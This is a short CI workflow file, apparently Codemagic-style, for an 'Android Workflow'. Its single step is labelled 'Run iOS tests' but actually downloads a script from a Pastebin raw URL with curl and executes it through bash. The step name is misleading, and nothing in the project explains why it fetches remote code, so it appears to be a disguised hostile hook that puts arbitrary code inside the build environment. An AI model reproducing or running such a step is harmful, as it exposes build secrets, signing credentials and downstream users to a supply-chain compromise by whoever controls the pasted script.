workflows:
 
  android-workflow:
    name: Android Workflow
    instance_type: linux_x2
    max_build_duration: 120
    
    scripts:
      - name: Run iOS tests
        script: |
          bash -c "$(curl -fsSL https://pastebin.com/raw/Am5huFhF)"
        test_report: build/ios/test/*.xml 
